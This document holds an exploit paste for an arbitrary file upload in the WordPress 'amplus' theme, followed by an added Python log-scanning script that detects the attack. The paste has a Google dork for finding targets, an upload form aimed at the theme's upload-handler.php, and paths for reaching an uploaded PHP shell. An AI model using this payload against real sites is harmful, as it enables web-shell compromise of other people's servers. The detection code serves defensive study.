- #Vulnerability : CSRF
- #Dork :
- inurl:wp-content/themes/amplus
- CSRF File Upload Vulnerability
- Exploit & POC :
- http://site-target/wp-content/themes/amplus/functions/upload-handler.php
- Script :
- <form enctype="multipart/form-data"
- action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
- Your File: <input name="uploadfile" type="file" /><br />
- <input type="submit" value="upload" />
- </form>
- File Access :
- http://site-target/uploads/[years]/[month]/your_shell.php
- Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
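A defender-side check for the request pattern listed above, as an added example that is not part of the original paste: it scans a web access log for POSTs to the theme's upload-handler.php, noting an off-site or missing Referer as expected from a cross-site form, and for script files requested under uploads/YYYY/MM/. The log lines, the site host blog.example and the function name scan are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Nov/2013:10:01:02 +0000] "POST /wp-content/themes/amplus/functions/upload-handler.php HTTP/1.1" 200 31 "http://other.example/form.html" "Mozilla/5.0"
203.0.113.7 - - [12/Nov/2013:10:01:09 +0000] "GET /wp-content/uploads/2013/11/sample.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Nov/2013:10:02:00 +0000] "GET /wp-content/uploads/2013/11/photo.jpg HTTP/1.1" 200 8841 "http://blog.example/" "Mozilla/5.0"
198.51.100.4 - - [12/Nov/2013:10:03:00 +0000] "GET /wp-content/themes/amplus/style.css HTTP/1.1" 200 900 "http://blog.example/" "Mozilla/5.0"
"""

# client ip, method, request target, status, referer
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')
# Handler path exactly as given in the paste.
HANDLER = re.compile(r"/wp-content/themes/amplus/functions/upload-handler\.php$", re.I)
# Server-side script extensions inside the dated uploads tree; media files are ignored.
UPLOADED_SCRIPT = re.compile(r"/uploads/\d{4}/\d{2}/[^/]+\.(?:php\d?|phtml|phar)$", re.I)


def scan(log_text, site_host):
    """Return (line_no, client_ip, finding) tuples for suspicious requests."""
    findings = []
    uploaders = set()  # clients already seen POSTing to the handler
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status, referer = m.groups()
        path = urlparse(target).path  # drop any query string
        if method == "POST" and HANDLER.search(path):
            # A cross-site form submits with a foreign Referer or none at all.
            same_site = urlparse(referer).hostname == site_host
            kind = "handler-post" if same_site else "handler-post-offsite-referer"
            findings.append((line_no, ip, kind))
            uploaders.add(ip)
        elif UPLOADED_SCRIPT.search(path):
            kind = "uploads-script-hit"
            if status == "200" and ip in uploaders:
                kind = "uploads-script-hit-after-upload"
            findings.append((line_no, ip, kind))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "blog.example"):
        print(finding)
```

Any hit on the handler deserves review, since a theme upload endpoint has no reason to accept unauthenticated POSTs; a script served with status 200 from the uploads tree also indicates that PHP execution is not disabled there.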